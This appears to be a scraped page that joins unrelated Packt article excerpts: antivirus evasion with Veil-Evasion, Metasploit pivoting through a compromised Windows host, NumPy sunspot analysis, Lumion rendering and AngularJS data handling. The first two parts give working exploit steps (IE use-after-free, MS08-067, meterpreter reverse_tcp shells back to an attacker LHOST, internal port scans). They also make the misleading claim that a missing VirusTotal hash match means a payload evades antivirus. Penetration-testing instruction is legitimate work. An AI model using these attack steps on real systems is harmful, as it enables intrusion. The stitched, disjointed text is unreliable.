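In practice you would feed it the raw output of your shellcode generator and paste the resulting string into the prompt in one line.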
Because AV vendors can release signatures that quickly, users are clearly admonished with the message "don't submit samples to any online scanner!"

Veil-Evasion instead allows testers to run a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload should bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:

Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software.

To use the payload with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion. When the listener is functional, send the exploit to the target system. When the victim launches it, it will establish a reverse shell back to the attacker's system.

Summary

Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection.

Resources for Article:

Further resources on this subject:
- Kali Linux – Wireless Attacks [Article]
- Web app penetration testing in Kali [Article]
- Customizing a Linux kernel [Article]

Packt
17 Jun 2014
6 min read

Using the client as a pivot point

Pivoting

To set our potential pivot point, we first need to exploit a machine. Then we check for a second network card in the machine, connected to another network that we cannot reach without going through the machine we exploited. As an example, we will use three machines: a Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine as the second victim.

The scenario is that we get a client to visit our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website:

The exploit listed at the top of the list is one that works against Internet Explorer 9. As an example, we will target the exploit that works against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated.

Start up the metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot:

One concern is that the exploit is rated as good, whereas we prefer ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and will have to make the choice to either write our own exploit or document it and move on with the testing.

For the example used here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the address of your own Kali machine.
We will enter the following commands in the metasploit window:

```
use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.177.170
set LHOST 192.168.177.170
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
```

An example of the results of the preceding commands is shown in the following screenshot:

As the previous screenshot shows, we now have the URL that we need the user to access. For our purposes, we will just copy and paste it into Internet Explorer 8, running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge of the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot:

Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important)

We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot:

As the previous screenshot shows, we are in luck. We have a second network card connected, and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell: it provides us with the capability to set the route up. In the shell, enter run autoroute -s 10.2.0.0/24 to set up a route to our 10 network.
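The route we just added tells Meterpreter to relay traffic for any address inside 10.2.0.0/24 through our session. Deciding whether a destination falls inside that block is a simple prefix-containment check, sketched here with Python's standard ipaddress module (the function name is just an illustration):

```python
import ipaddress

def routed_via_pivot(dest, network='10.2.0.0/24'):
    """True if dest falls inside the subnet we routed through the
    compromised host -- the containment test behind the autoroute
    entry above. Names here are illustrative, not metasploit code."""
    return ipaddress.ip_address(dest) in ipaddress.ip_network(network)

print(routed_via_pivot('10.2.0.149'))       # inside the pivoted network
print(routed_via_pivot('192.168.177.170'))  # our own Kali box: not routed
```

Traffic matching the check is sent through session 1; everything else uses the attacker machine's normal routing.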
Once the command is complete, we will view our routing table; enter run autoroute -p to display it. An example of this is shown in the following screenshot:

As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will background session 1; press Ctrl + Z to background the session. We will use the scan capability from within the metasploit tool. Enter the following commands:

```
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.0.0/24
set PORTS 139,445
set THREADS 50
run
```

The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit instead; enter nmap -sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results of this scan is shown in the following screenshot:

We now have a target, and we could use a number of the methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Server Service buffer overflow. In the metasploit window, background the current session and enter the following commands:

```
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.2.0.149
set PAYLOAD windows/meterpreter/bind_tcp
exploit
```

If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration of the machine. From here, it is just a matter of carrying out the same process we followed before, and if you find another dual-homed machine, you can make another pivot and continue. An example of the results is shown in the following screenshot:

As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected in the Local Pipe | Remote Pipe reference.
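The TCP port scanner used earlier simply attempts a full connect to each host/port pair. The core of such a connect scan can be sketched in a few lines of Python; this is a simplified stand-in for the auxiliary/scanner/portscan/tcp module, without its threading or timing logic:

```python
import socket

def tcp_port_open(host, port, timeout=1.0):
    """Attempt a full TCP connect; True means something accepted the
    connection. This mirrors what a connect scan does per port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

def scan(host, ports):
    """Return the subset of ports that accepted a connection."""
    return [p for p in ports if tcp_port_open(host, p)]
```

In the lab scenario above, this would be pointed at hosts in 10.2.0.0/24 on ports 139 and 445; for real engagements, Nmap or the metasploit module remain the right tools, since they handle threading, timing, and service detection properly.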
Once you have finished reviewing the information, enter sessions to display the details of the open sessions. An example of this result is shown in the following screenshot:

Summary

In this article, we looked at the powerful technique of establishing a pivot point from a client.

Resources for Article:

Further resources on this subject:
- Installation of Oracle VM VirtualBox on Linux [article]
- Using Virtual Destinations (Advanced) [article]
- Quick Start into Selenium Tests [article]

Packt
12 Jun 2014
6 min read

Signal Processing Techniques

(For more resources related to this topic, see here.)

Introducing the Sunspot data

Sunspots are dark spots visible on the Sun's surface. This phenomenon has been studied for many centuries by astronomers. Evidence has been found for periodic sunspot cycles. We can download up-to-date annual sunspot data from http://www.quandl.com/SIDC/SUNSPOTS_A-Sunspot-Numbers-Annual. The data is provided by the Belgian Solar Influences Data Analysis Center. It goes back to 1700 and contains more than 300 annual averages.

In order to determine sunspot cycles, scientists successfully used the Hilbert-Huang transform (refer to http://en.wikipedia.org/wiki/Hilbert%E2%80%93Huang_transform). A major part of this transform is the so-called Empirical Mode Decomposition (EMD) method. The entire algorithm contains many iterative steps, and we will cover only some of them here. EMD reduces data to a group of Intrinsic Mode Functions (IMF). You can compare this to the way the Fast Fourier Transform decomposes a signal into a superposition of sine and cosine terms.

Extracting IMFs is done via a sifting process. The sifting of a signal is related to separating out the components of a signal one at a time. The first step of this process is identifying local extrema. We will perform the first step and plot the data with the extrema we found. Let's download the data in CSV format. We also need to reverse the array to have it in the correct chronological order. The following code snippet finds the indices of the local minima and maxima, respectively:

```python
mins = signal.argrelmin(data)[0]
maxs = signal.argrelmax(data)[0]
```

Now we need to concatenate these arrays and use the indices to select the corresponding values.
The following code accomplishes that and also plots the data:

```python
import numpy as np
import sys
import matplotlib.pyplot as plt
from scipy import signal

data = np.loadtxt(sys.argv[1], delimiter=',', usecols=(1,), unpack=True, skiprows=1)

# Reverse order
data = data[::-1]
mins = signal.argrelmin(data)[0]
maxs = signal.argrelmax(data)[0]
extrema = np.concatenate((mins, maxs))
year_range = np.arange(1700, 1700 + len(data))
plt.plot(1700 + extrema, data[extrema], 'go')
plt.plot(year_range, data)
plt.show()
```

We will see the following chart:

In this plot, you can see the extrema indicated with dots.

Sifting continued

The next steps in the sifting process require us to interpolate the minima and the maxima with cubic splines. This creates an upper envelope and a lower envelope, which should surround the data. The mean of the envelopes is needed for the next iteration of the EMD process. We can interpolate the minima with the following code snippet:

```python
spl_min = interpolate.interp1d(mins, data[mins], kind='cubic')
min_rng = np.arange(mins.min(), mins.max())
l_env = spl_min(min_rng)
```

Similar code can be used to interpolate the maxima. We need to be aware that the interpolation results are only valid within the range over which we are interpolating. This range starts at the first occurrence of a minimum/maximum and ends at the last occurrence of a minimum/maximum. Unfortunately, the interpolation ranges we can define in this way for the maxima and minima do not match perfectly. So, for the purpose of plotting, we need to extract a shorter range that lies within both the maxima and minima interpolation ranges.
Have a look at the following code:

```python
import numpy as np
import sys
import matplotlib.pyplot as plt
from scipy import signal
from scipy import interpolate

data = np.loadtxt(sys.argv[1], delimiter=',', usecols=(1,), unpack=True, skiprows=1)

# Reverse order
data = data[::-1]
mins = signal.argrelmin(data)[0]
maxs = signal.argrelmax(data)[0]
extrema = np.concatenate((mins, maxs))
year_range = np.arange(1700, 1700 + len(data))

spl_min = interpolate.interp1d(mins, data[mins], kind='cubic')
min_rng = np.arange(mins.min(), mins.max())
l_env = spl_min(min_rng)

spl_max = interpolate.interp1d(maxs, data[maxs], kind='cubic')
max_rng = np.arange(maxs.min(), maxs.max())
u_env = spl_max(max_rng)

inclusive_rng = np.arange(max(min_rng[0], max_rng[0]), min(min_rng[-1], max_rng[-1]))
mid = (spl_max(inclusive_rng) + spl_min(inclusive_rng)) / 2

plt.plot(year_range, data)
plt.plot(1700 + min_rng, l_env, '-x')
plt.plot(1700 + max_rng, u_env, '-x')
plt.plot(1700 + inclusive_rng, mid, '--')
plt.show()
```

The code produces the following chart:

What you see is the observed data, with the computed envelopes and mid line. Obviously, negative values don't make any sense in this context. However, for the algorithm we only need to care about the mid line of the upper and lower envelopes. In these first two sections, we basically performed the first iteration of the EMD process. The algorithm is a bit more involved, so we will leave it up to you whether or not you want to continue with this analysis on your own.
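The heart of this first sifting iteration — envelopes through the extrema and their midline — can also be reproduced without SciPy, by using linear interpolation in place of the cubic splines. The sketch below is a simplified stand-in: np.interp is linear, so the envelopes are cruder than the interp1d(kind='cubic') version above, but the structure of the computation is the same.

```python
import numpy as np

def envelope_mean(data):
    """Simplified first EMD sifting step: find local extrema,
    interpolate lower/upper envelopes (linearly, unlike the cubic
    splines used above), and return the envelope midline."""
    x = np.arange(len(data))
    interior = x[1:-1]
    # Neighbor comparisons play the role of argrelmin/argrelmax here.
    mins = interior[(data[1:-1] < data[:-2]) & (data[1:-1] < data[2:])]
    maxs = interior[(data[1:-1] > data[:-2]) & (data[1:-1] > data[2:])]
    l_env = np.interp(x, mins, data[mins])   # lower envelope
    u_env = np.interp(x, maxs, data[maxs])   # upper envelope
    return (l_env + u_env) / 2

# A pure sine oscillates symmetrically around zero, so away from the
# boundaries its envelope midline should stay close to zero.
t = np.linspace(0, 6 * np.pi, 200)
mid = envelope_mean(np.sin(t))
print(np.abs(mid[30:-30]).max())
```

Note that np.interp clamps to the endpoint values outside the first/last extremum, which is one reason real EMD implementations treat the boundaries with more care.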
Exponentially decreasing weights, for instance, can be expressed as follows in NumPy code:

```python
weights = np.exp(np.linspace(-1., 0., N))
weights /= weights.sum()
```

A simple moving average, in contrast, uses equal weights, which, in code, looks as follows:

```python
def sma(arr, n):
    weights = np.ones(n) / n
    return np.convolve(weights, arr)[n-1:-n+1]
```

The following code plots the simple moving average for the 11- and 22-year sunspot cycles:

```python
import numpy as np
import sys
import matplotlib.pyplot as plt

data = np.loadtxt(sys.argv[1], delimiter=',', usecols=(1,), unpack=True, skiprows=1)

# Reverse order
data = data[::-1]
year_range = np.arange(1700, 1700 + len(data))

def sma(arr, n):
    weights = np.ones(n) / n
    return np.convolve(weights, arr)[n-1:-n+1]

sma11 = sma(data, 11)
sma22 = sma(data, 22)

plt.plot(year_range, data, label='Data')
plt.plot(year_range[10:], sma11, '-x', label='SMA 11')
plt.plot(year_range[21:], sma22, '--', label='SMA 22')
plt.legend()
plt.show()
```

In the following plot, we see the original data and the simple moving averages for the 11- and 22-year periods. As you can see, moving averages are not a good fit for this data; this is generally the case for sinusoidal data.

Summary

This article gave us examples of signal processing and time-series analysis. We looked at the sifting process, performing the first iteration of the EMD method. We also learned about moving averages, which are tools commonly used to analyze time-series data.

Resources for Article:

Further resources on this subject:
- Advanced Indexing and Array Concepts [Article]
- Fast Array Operations with NumPy [Article]
- Move Further with NumPy Modules [Article]

Packt
12 Jun 2014
22 min read

Unleashing the powers of Lumion

Lumion supports a direct import of SketchUp files, which means that we don't need to use any special format to have our 3D model in Lumion. But if you are working with modeling packages, such as 3ds Max, Maya, and Blender, you need to use a different approach by exporting a COLLADA or FBX file as these two are the best formats to work with Lumion. In particular situations, we may need to use our own animations. You may be aware that we can import basic animations in Lumion from 3D modeling packages such as 3ds Max. Lumion uses the flexibility of shortcuts to improve the control we have in the 3D world. Once we import a 3D model or even if we use a model from the Lumion library, we need to adjust the position, the orientation, and the scale of the 3D model. But keep in mind the importance of organizing your 3D world using layers as well. They are free and they will become very useful when we need to hide some objects to focus our attention on a specific detail or when we use the Hide layer and Show layer effect. At a certain point in our project, we will need to go back and undo a mistake or something that doesn't look as expected. Lumion offers you a very limited undo option. When working with Lumion, and in particular, when organizing our 3D world, and arranging and adjusting the 3D models, we might find the possibility of locking the 3D model's position to be useful. This helps us to avoid selecting and unintentionally moving other, already placed 3D models. From the beginning of our project with Lumion, it is very important for us to organize and categorize our 3D world. Sometimes we may not do this straightaway, and only after importing some 3D models and adding some content from the Lumion library we realize the need to organize our project in a better way. We can use layers and assign the existing 3D models to a new layer. 
Over the course of a project, it is very common to have certain 3D models updated, and we need to update those 3D models into our Lumion project. This can be a rather daunting task, taking into account that most of the time these updates in the 3D models happen after we have already assigned materials to the imported 3D model. Sometimes during the project, we may face a radical change in a 3D model we have already imported into the Lumion project. The worst scenario is reassigning all the materials to the new 3D model and perhaps relocating to the correct place. However, Lumion has an option to help us with this and to avoid reassigning all the materials or at least not all of them, and the 3D models will stay in exactly the same place. After importing a 3D model we created in our favorite 3D modeling package, it is likely that we want to enhance the look and the environment of the project by using additional 3D models. The lack of detail and content will definitely create a lifeless and dull image or video. Lumion will not only help you learn how to place content from the Lumion library, but also how you can discover what you need. Something indispensable for a smooth workflow in every project are the copy and paste tools. Imagine having to go to the import library to place the 3D model again and assigning a material every single time we need a 3D model. Lumion doesn't have a standard copy and paste tool that we can find in most software, but there is a way to emulate this feature. Lumion will help you copy a 3D model already present in your scene and avoid the trouble of going back to the Lumion library and placing a 3D model already present in your project. Removing or deleting a 3D model is a part of the process of any project. This can be particularly tricky when our 3D world is crowded with 3D models and there is a possibility of selecting and deleting the wrong 3D model. 
Nevertheless, Lumion does a great job in this area because it protects you from deleting something by mistake. All projects are different, and this typically brings in unique challenges. Sometimes, a building or the environment are really intricate, and this can cause difficulties when we are placing 3D models from the Lumion library. Lumion recognizes surfaces and will avoid intersecting them with any 3D model you want to place in your world. However, there are times when this feature may be in our way and cause difficulties when placing a 3D model. A project needs life, but placing dozens of models one by one is a massive task. Lumion helps us to populate our 3D world by providing the option to place more than one copy at a time. By means of a shortcut, we can place 10 copies of a 3D model. The world we live in is bursting with diversity and variety. Consequently, our eyes are incredible in picking up repetitions. Sometimes, even if we cannot explain why, we know something is wrong with a picture because it doesn't look natural. When we are working on a big project, such repetitions stand out almost immediately. We can use a feature in Lumion that gives us the ability to randomize the size of 3D models while placing them. With more than 2,000 models, we can say that Lumion has everything we need to use in our project. Although Lumion has predefined models, it doesn't mean that we can't modify some basic options. We can modify simple settings such as color and texture, but keep in mind that this doesn't mean we can change these settings in every single 3D model. In almost every project, we have some autonomy to place the 3D models and organize the 3D world. Nevertheless, there are times when we really need more accuracy than one can get with the mouse. Lumion's coordinate system can assist us with this task. Typically, we focus our attention on selecting separate 3D models so that we can make exact and accurate adjustments. 
Eventually, we will need to make alterations and modifications to multiple 3D objects. Lumion shows you how you can do this, along with a practical application. While working with selections in Lumion, every time we make a selection and transform the 3D model, we need to choose the correct category. There are particular occasions when we need to select and manipulate 3D models that belong to different categories. Lumion can select 3D models from different categories in one go.

Initially, we may find Lumion very restrictive in the way it works with the content placed in our project, because we need to select the correct category every time we want to work with a 3D model. However, we can bypass these restrictions by using the option to select and move any 3D model in our world without selecting a category.

As mentioned earlier, the world we live in is full of diversity and randomness; however, on almost every project, there are some situations when we need to place content in an orderly way. A quick example is when we need to place garden lamps along a path, spaced equally. This can be done in Lumion.

Lumion is a unique application not only because of what we can do with incredible quality, but also because we have features that initially may not seem beneficial at all until we work on a project where we see a practical application. One example is aligning the orientations of different 3D models; Lumion shows not only how to use this feature, but also how to apply it in a practical situation.

While populating and arranging our project, there are times when a snapping tool comes in handy. We can always use the move and height tools to place a 3D model on top of or next to another 3D model, but Lumion also allows us to snap multiple 3D models to the same position in an easy way. While placing content in our project, we are usually concerned about the location of the 3D model.
However, later we realize that our project is too uniform, and this is easily spotted with plants, trees, flowers, and other objects. Instead of selecting an individual 3D model and manually rotating, relocating, and rescaling it to bring some variety to our project, Lumion helps us out with a fantastic feature to randomize the orientation, position, and scale of the 3D models.

Even in the most perfect project, we can find variations in the terrain and in the building; it's natural that we find inclined surfaces. Rotate on model is a feature in Lumion that allows us to snap to the surface of other 3D models when we are moving a 3D model. We can use this to adjust a car on a slope or a book on a chair.

While changing a 3D model's rotation, we can see that when the model gets close to a 90 degree angle, it will snap automatically. This is fine in most cases, but there are times when we need to make some precise adjustments, and then this option can get in our way. Lumion lets us deactivate this feature temporarily.

An initial tactic to sculpt and shape the terrain is to use the terrain brushes available in Lumion. Lumion is not an application like ZBrush, but it does well with the brushes provided to sculpt the terrain, and they are not difficult to master. Lumion explains how we can use them, with some practical applications in real projects.

We know how to use the five brushes to sculpt the terrain and the different results of each one of them. However, we are not limited to the standard values used in each brush, because Lumion allows us to change two settings to help us sculpt the terrain. This control is useful when we need to add details at a small or large scale.

Some projects don't require any specific terrain from us, but at the same time, we don't want to use a flat terrain. In the Terrain menu, we can find some tools that help us to quickly create mountains and modify other characteristics of our project.
When we start a new project in Lumion, we can choose from nine different presets. They work as shortcuts to help us get the appearance we want for our project. Most of the time, we may use the Grass preset, but that doesn't mean we are stuck with the landscape presented. We know how to sculpt the terrain, but we can do more than that in Lumion and completely change the aspect of the landscape.

Although we have 20 presets to entirely change the look of the landscape, this doesn't mean that we cannot change any settings and actually paint the landscape. Lumion explores the Paint submenu and shows how we can use Lumion's textures to paint and change the landscape completely.

Perhaps you don't want the trouble of sculpting the terrain using the tools offered in Lumion. Truth be told, in some situations it is easier and more productive to model the terrain outside Lumion and import that terrain along with the building. Lumion has a fantastic material that blends the terrain we imported with the landscape.

Another solution to create accurate terrains is by means of a heightmap. A heightmap is a texture with stored values that can be used, in this case, by Lumion to translate this 2D information into a 3D terrain. Lumion will help you see how you can import a heightmap and save the terrain you created in Lumion as a heightmap file.

It is remarkable how little things, such as defining the Sun's direction, can have a considerable impact on a project. Throughout the production process, we may need to adjust the Sun's direction to have a clear view of the project; however, in due course, we will get to a point where we need to define the final orientation that we are going to use to produce a still image or a movie.

Setting up the Sun's direction and height is one of the simplest tasks in Lumion; however, by only using the Weather menu, we can start feeling that there is a lack of control over these settings. Fear not though!
Lumion offers an effect that provides assistance to control the Sun in a way that can make all the difference when producing a video. Lumion will help you comprehend not only how you can modify the settings for the Sun, but will also provide you with a practical example of how you can apply this feature in any project.

A shadow can be defined as an area that is not, or is only partially, illuminated because an object is obstructing its source of illumination. It is true that we often don't think of shadows as important and essential elements in creating a good-looking scenario, but without them our project would be dull. Lumion is going to help us use the Shadow effect to tweak and correct the shadows in order to meet our requirements and the finished look we want to accomplish.

An additional aspect connected to shadows in Lumion, as in the real world, is the influence of the sky over shadows. Taking a look at the shadows in any project, you can easily see how a sunset or a midday scene can transform the color of the shadows. Lumion will show how to control and change the influence that skylight has on shadows.

We have been working entirely with hard shadows. The Sun in our 3D world can produce these hard shadows, so called because they have strong and well-defined edges with little transition between illumination and shadow. Soft shadows can be produced by the Sun in certain circumstances, and the sky, likewise, can create these diffused shadows with soft edges. We can apply soft shadows to our project to enrich the final look.

So far, we have been looking at how we can use the Weather menu to create an enjoyable environment for our exterior scenes. Lumion is also capable of producing beautiful interior scenes, but we need to work a little with the interior illumination before we can produce something that is presentable and eye-catching.
For interior scenes, we can use the Global Illumination effect to improve the illumination that is provided either by the Sun or by an artificial source of illumination. We can improve the interior look and illumination using Global Illumination.

An element that can bring an extra touch to the final movie is the clouds. This is a component that does not always cross our mind when trying to attain a good-looking and realistic movie. Lumion provides us with a lot of freedom not only to change the appearance of the clouds, but also to animate them and even create volume clouds to take this fine-tuning to a different dimension.

Fog is a natural phenomenon that can be added to our project, and it can change a scene dramatically. With it, we can make a scene more mysterious or reproduce the haze where dust, smoke, and other dry particles obscure the clarity of the sky. With the Fog effect, we can achieve this and much more.

The fact that we can add rain and snow as easily as reading this sentence really proves that Lumion is a powerful and versatile application. Adding rain or snow is something that we can easily achieve by adding two effects in the Photo or Movie mode.

Lumion uses wind by default in any project you start. Once you add the first trees, you can see how they slowly move, showing the effect of the wind. We can control the wind using the, yes you are right, Foliage Wind effect.

Another option to control the Sun is a new feature introduced in Lumion Version 4. This option, which we can find under the Effects label, is called Sun study. It is an amazing feature that allows us to select any point on the planet and mimic the Sun in that location. However, there is much more that we can do with this effect.

Lumion has more than 500 materials on hand, and generally this is more than adequate. Still, Lumion is a very flexible application, and for this reason, you are not fixed with just these materials.
We have the opportunity to use our own textures to create other materials. We are not going to look at all the settings that you can use to tweak a material; instead, we are going to focus on how we can replace and adjust an outside texture.

Making a 3D model invisible or hiding surfaces of our 3D model is something that we don't expect to do in every project. However, there are times when the Invisible material can be very handy, and Lumion demonstrates not only how to apply it, but also some specific situations in which we may consider using this material.

Glass is essential in any project we work on. From the glass in a complex window to a simple cup made of glass, this material has a deep impact on a still image and even more on a movie, helping us capture the light and reflections of the environment. Lumion has a glass material that can be used to create some of these materials. The Glass material can be manipulated to get a more realistic look.

During production, it is expected that we save the materials applied to the 3D models. This should be done as a precaution, in case something goes wrong or when we need to go back and forth with materials without losing any settings. Lumion has an option to save the materials you applied to a 3D model and load them again later, if necessary. There is another feature that Lumion is going to show you, which will give you a chance to save a single material instead of material sets.

There are different ways in which we can add water to our project. We can create an ocean as easily as reading this sentence, and the same is true when we need to add a body of water or create a swimming pool. However, what if we want to create a fountain? Let's go even further: can we create a river? Lumion will teach you how easy it is to create a streaming water effect.

Another beautiful and eye-catching effect is when we have glowing materials in our project.
From light bulbs to TV screens, we can add an extra touch to our scene by using the Standard material to create this glow effect. Lumion will teach you not only how to add this glow, but also how you can use textures to produce interesting effects.

After adding trees, bushes, and other plants, the next thing you should add to the project is some grass. Prior to Lumion Version 4, you had to be satisfied with the terrain's texture. We could also import some grass, though the project would become very heavy, or add some grass from the Lumion library and adjust it in the best way possible. Now, Lumion provides an option to use realistic grass, bringing that wow factor.

Each material has a certain amount of reflection, and this is a setting that we can adjust in almost every material that we can find in Lumion. Taking into account that Lumion is a real-time application, it is natural that in some cases the reflections don't meet our requirements in terms of accuracy. Lumion has an effect that we can apply to surfaces in our 3D model to improve these reflections.

While applying and tweaking materials, you may come across a section in your 3D model where you can easily see some flickering. Although this should be avoided, there is an inbuilt setting in every Lumion material to correct this problem.

Fire is a special effect available in Lumion and is one of those elements that can bring an ordinary scene to life. We may have a living room that per se is excellent, with all the materials and light, but when we add fire to the fireplace, it completely transforms the room into a warm, comfortable, and welcoming living room. Alternatively, consider how the same living room can be changed to introduce a romantic scene when illuminated with candles and a fireplace. Lumion helps you apply fire and control it using the Edit properties menu.

In addition to the solid and liquid elements in Lumion, we can find elements that we could label as non-solid.
Lumion has a special section for these elements, opening with smoke, passing all the way through dust, and finishing with fog and water vapor. Lumion will teach you how to place these elements in your project, along with a realistic application of some of them.

Fountains have their distinctive place in Lumion, and there is a tab dedicated to different categories of fountains. We can separate this tab into two parts: standard fountains and fountains produced by a waterspray emitter. Lumion shows you where to find these fountains and how to place them in the scene, and also provides you with some useful applications.

Falling leaves are an enjoyable extra touch that can improve our still image or movie. Nevertheless, like the preceding special effects, this one needs to be used in the correct amount. Too much can ruin the scene, making the viewer focus more on leaves passing through the screen than on the 3D model.

We can add text to a movie or a still image using the Titles effect, but in some circumstances, we need a text element with more flexibility. Sometimes, when working on a presentation of a project, we are required to show some additional information; this can be easily achieved using this fantastic feature available in Lumion. We can add text to our project in the Build mode.

A clip plane is an object that can be added to a scene and later used in the Movie mode, where it can be animated to produce a kind of revealing effect. Although it may seem a little confusing initially, you will understand how to apply it to your scene and animate this plane.

It is time to move on from special effects, such as fire, smoke, and water, that we can add to the scene and move towards effects that we can apply in both the Movie and Photo modes. Lumion gives you an overview of how general effects work, how you can stack them in either the Movie or Photo mode, and how you can control them.
It is logical that all the effects available in Lumion are applied using either the Movie or Photo mode. The reason for this is that if all those effects were applied in the Build mode, they would have a massive impact on the performance of the viewport, slowing down our workflow. However, Lumion likes to provide you with the freedom needed to produce the best result possible, and in some situations, it can be useful to check the effects in the Build mode.

Bloom is the halo effect caused principally by bright lights in the scene. In the real world, the camera lenses we use can never focus perfectly, but this is not a problem under normal conditions. However, when there is an intensely bright light in the scene, these imperfections are perceptible and visible, and as a consequence, in the photo that we shoot, the bright light will appear to bleed beyond its usual borders.

Purple fringing, distortion, and blurred edges are a combination of errors called chromatic aberration. A simple explanation is that chromatic aberration happens when the lens fails to focus or bring all the wavelengths of color to the same focal plane. As light travels through the lens, the different colors travel at different speeds and land at different places on the camera's sensor. With 3D cameras, this doesn't happen, but we can add chromatic aberration to our image or video, giving an extra touch of realism.

The expression "color correction" has a fair number of different meanings. However, generally speaking, we can say that it is a means to repair problems with color, and we do that by changing the color of a pixel to another color or by tweaking other settings. In Lumion, this means that we can use color correction either to achieve a certain look or to enhance the overall aspect and mood of an image or a movie. We can use this effect in Lumion and apply a few tips to help us not only correct the color, but also perform some color grading.
Working with Live Data and AngularJS

Packt
12 Jun 2014
14 min read
(For more resources related to this topic, see here.) Big Data is a new field that is growing every day. HTML5 and JavaScript applications are being used to showcase these large volumes of data in many new and interesting ways. Some of the latest client implementations are being accomplished with libraries such as AngularJS. This is because of its ability to efficiently handle and organize data in many forms.

Making business-level decisions based on real-time data is a revolutionary concept. Humans have only been able to fathom metrics based on large-scale systems, in real time, for the last decade at most. During this time, the technology to collect large amounts of data has grown tremendously, but the high-level applications that use this data are only just catching up. Anyone can collect large amounts of data with today's complex distributed systems. Displaying this data in formats that allow any level of user to digest and understand its meaning is currently the main portion of what leading-edge technology is trying to accomplish.

There are many different formats that raw data can be displayed in. The trick is to figure out the most efficient ways to showcase patterns and trends, which allow more accurate business-level decisions to be made.

We live in a fast-paced world where everyone wants something done in real time. Load times must be in milliseconds, new features are requested daily, and deadlines get shorter and shorter. The Web gives companies the ability to generate revenue from a completely new market, and AngularJS is on the leading edge. This new market creates many new requirements for HTML5 applications.

JavaScript applications are becoming commonplace in major companies. These companies are using JavaScript to showcase many different types of data in both inward- and outward-facing products. Working with live data sets in client-side applications is a common practice and is the real-world standard.
Most applications today use some type of live data to accomplish a given set of tasks. These tasks rely on this data to render views that the user can visualize and interact with. There are many advantages of working with the Web for data visualization, and we are going to showcase how these tie into an AngularJS application.

AngularJS offers different methods to accomplish a view that is in charge of elegantly displaying large amounts of data in very flexible and snappy formats. Some of these methods feed directives data that has been requested and resolved, while others allow the directive to maintain control of the requests. We will go over these different techniques for efficiently getting live data into the view layer by creating different real-world examples. We will also go over how to properly test directives that rely on live data to achieve their view successfully.

Techniques that drive directives

Most standard data requirements for a modern application involve an entire view that depends on a set of data. This data should be dependent on the current state of the application. The state can be determined in different ways. A common tactic is to build URLs that replicate a snapshot of the application's state. This can be done with a combination of URL paths and parameters. URL paths and parameters are what you will commonly see change when you visit a website and start clicking around.

An AngularJS application is made up of different route configurations that use the URL to determine which action to take. Each configuration will have an associated controller, template, and other options. These configurations work in unison to get data into the application in the most efficient ways.

AngularUI also offers its own routing system. This UI-Router is a simple system built on complex concepts, which allows nested views to be controlled by different state options.
This concept yields the same result as ngRoute, which is to get data into the controller; however, UI-Router does it in a more elegant way, which creates more options. AngularJS 2.0 will contain a hybrid router that utilizes the best of each.

Once the controller gets the data, it feeds the retrieved data to the template views. The template is what holds the directives that are created to perform the view-layer functionality. The controller feeds directives data, which forces the directives to rely on the controllers to be in charge of said data. This data can either be fed immediately after the route configurations are executed, or the application can wait for the data to be resolved.

AngularJS offers you the ability to make sure that data requests have been successfully accomplished before any controller logic is executed. The method is called resolving data, and it is utilized by adding resolve functions to the route configurations. This allows you to write the business logic in the controller in a synchronous manner, without having to write callbacks, which can be counter-intuitive.

The XHR extensions of AngularJS are built using promise objects. These promise objects are basically a way to ensure that data has been successfully retrieved or to verify whether an error has occurred. Since JavaScript embraces callbacks at its core, there are many points of failure with respect to timing issues of when data is ready to be worked with. This is where libraries such as the Q library come into play. The promise object allows the execution thread to resemble a more synchronous flow, which reduces complexity and increases readability.

The $q library

The $q factory is a lite instantiation of the formally accepted Q library (https://github.com/kriskowal/q). This lite package contains only the functions that are needed to defer JavaScript callbacks asynchronously, based on the specifications provided by the Q library.
